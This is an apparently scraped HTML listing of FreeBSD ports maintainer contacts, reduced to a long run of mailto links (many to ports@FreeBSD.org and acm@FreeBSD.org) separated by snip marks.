...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lwhsu@FreeBSD.org">lwhsu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vmagerya@gmail.com">vmagerya@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:brooks@FreeBSD.org">brooks@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:brooks@FreeBSD.org">brooks@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dk.diklab@gmail.com">dk.diklab@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jsa@FreeBSD.org">jsa@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:peter.schuller@infidyne.com">peter.schuller@infidyne.com</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:peter.schuller@infidyne.com">peter.schuller@infidyne.com</A>
...[SNIP]...
<A HREF="mailto:cracauer@cons.org">cracauer@cons.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:armin@frozen-zone.org">armin@frozen-zone.org</A>
...[SNIP]...
<A HREF="mailto:mva@FreeBSD.org">mva@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:c.petrik.sosa@gmail.com">c.petrik.sosa@gmail.com</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:wen@FreeBSD.org">wen@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kevlo@FreeBSD.org">kevlo@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:glewis@FreeBSD.org">glewis@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:arved@FreeBSD.org">arved@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chromium@hybridsource.org">chromium@hybridsource.org</A>
...[SNIP]...
<A HREF="mailto:housel@acm.org">housel@acm.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ed@FreeBSD.org">ed@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:amakawa@jp.FreeBSD.org">amakawa@jp.FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:glarkin@FreeBSD.org">glarkin@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dhn@FreeBSD.org">dhn@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:araujo@FreeBSD.org">araujo@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:maho@FreeBSD.org">maho@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:aldis@bsdroot.lv">aldis@bsdroot.lv</A>
...[SNIP]...
<A HREF="mailto:llwang@infor.org">llwang@infor.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pgj@FreeBSD.org">pgj@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:thierry@FreeBSD.org">thierry@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pmn@bakarika.net">pmn@bakarika.net</A>
...[SNIP]...
<A HREF="mailto:erik@bz.bzflag.bz">erik@bz.bzflag.bz</A>
...[SNIP]...
<A HREF="mailto:krion@FreeBSD.org">krion@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gerald@FreeBSD.org">gerald@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gerald@FreeBSD.org">gerald@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gerald@FreeBSD.org">gerald@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gerald@FreeBSD.org">gerald@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gerald@FreeBSD.org">gerald@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:deischen@freebsd.org">deischen@freebsd.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:karel@lovetemple.net">karel@lovetemple.net</A>
...[SNIP]...
<A HREF="mailto:karel@lovetemple.net">karel@lovetemple.net</A>
...[SNIP]...
<A HREF="mailto:freebsd-ports@coreland.ath.cx">freebsd-ports@coreland.ath.cx</A>
...[SNIP]...
<A HREF="mailto:thierry@FreeBSD.org">thierry@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:devon.odell@gmail.com">devon.odell@gmail.com</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:alepulver@FreeBSD.org">alepulver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:n.smoot@gmail.com">n.smoot@gmail.com</A>
...[SNIP]...
<A HREF="mailto:mjs@Bur.st">mjs@Bur.st</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:amatus@gnu.org">amatus@gnu.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:umq@ueo.co.jp">umq@ueo.co.jp</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lev@FreeBSD.org">lev@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:atrn@zeta.org.au">atrn@zeta.org.au</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:maho@FreeBSD.org">maho@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vmagerya@gmail.com">vmagerya@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:erik@bz.bzflag.bz">erik@bz.bzflag.bz</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mutoh@openedu.org">mutoh@openedu.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hq@FreeBSD.org">hq@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tdb@FreeBSD.org">tdb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chromium@hybridsource.org">chromium@hybridsource.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bf@FreeBSD.org">bf@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:armin@frozen-zone.org">armin@frozen-zone.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pete@twisted.org.uk">pete@twisted.org.uk</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:emulation@FreeBSD.org">emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:devel@stasyan.com">devel@stasyan.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:brooks@FreeBSD.org">brooks@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:brooks@FreeBSD.org">brooks@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:brooks@FreeBSD.org">brooks@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:him@richardkiss.com">him@richardkiss.com</A>
...[SNIP]...
<A HREF="mailto:him@richardkiss.com">him@richardkiss.com</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jre@vineyard.net">jre@vineyard.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rick@wzoeterwoude.net">rick@wzoeterwoude.net</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mainland@apeiron.net">mainland@apeiron.net</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jesper.louis.andersen@gmail.com">jesper.louis.andersen@gmail.com</A>
...[SNIP]...
<A HREF="mailto:dhn@FreeBSD.org">dhn@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mono@FreeBSD.org">mono@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mono@FreeBSD.org">mono@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:katsuji.ishikawa@gmail.com">katsuji.ishikawa@gmail.com</A>
...[SNIP]...
<A HREF="mailto:pjdelport@gmail.com">pjdelport@gmail.com</A>
...[SNIP]...
<A HREF="mailto:mathiasp@virtual-earth.de">mathiasp@virtual-earth.de</A>
...[SNIP]...
<A HREF="mailto:kaiw27@gmail.com">kaiw27@gmail.com</A>
...[SNIP]...
<A HREF="mailto:saper@saper.info">saper@saper.info</A>
...[SNIP]...
<A HREF="mailto:jimmy@mammothcheese.ca">jimmy@mammothcheese.ca</A>
...[SNIP]...
<A HREF="mailto:krion@FreeBSD.org">krion@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rene@FreeBSD.org">rene@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ozawa@ongs.co.jp">ozawa@ongs.co.jp</A>
...[SNIP]...
<A HREF="mailto:ninjin@kth.se">ninjin@kth.se</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:netj@sparcs.kaist.ac.kr">netj@sparcs.kaist.ac.kr</A>
...[SNIP]...
<A HREF="mailto:jhay@FreeBSD.org">jhay@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jaapb@kerguelen.org">jaapb@kerguelen.org</A>
...[SNIP]...
<A HREF="mailto:bkoenig@cs.tu-berlin.de">bkoenig@cs.tu-berlin.de</A>
...[SNIP]...
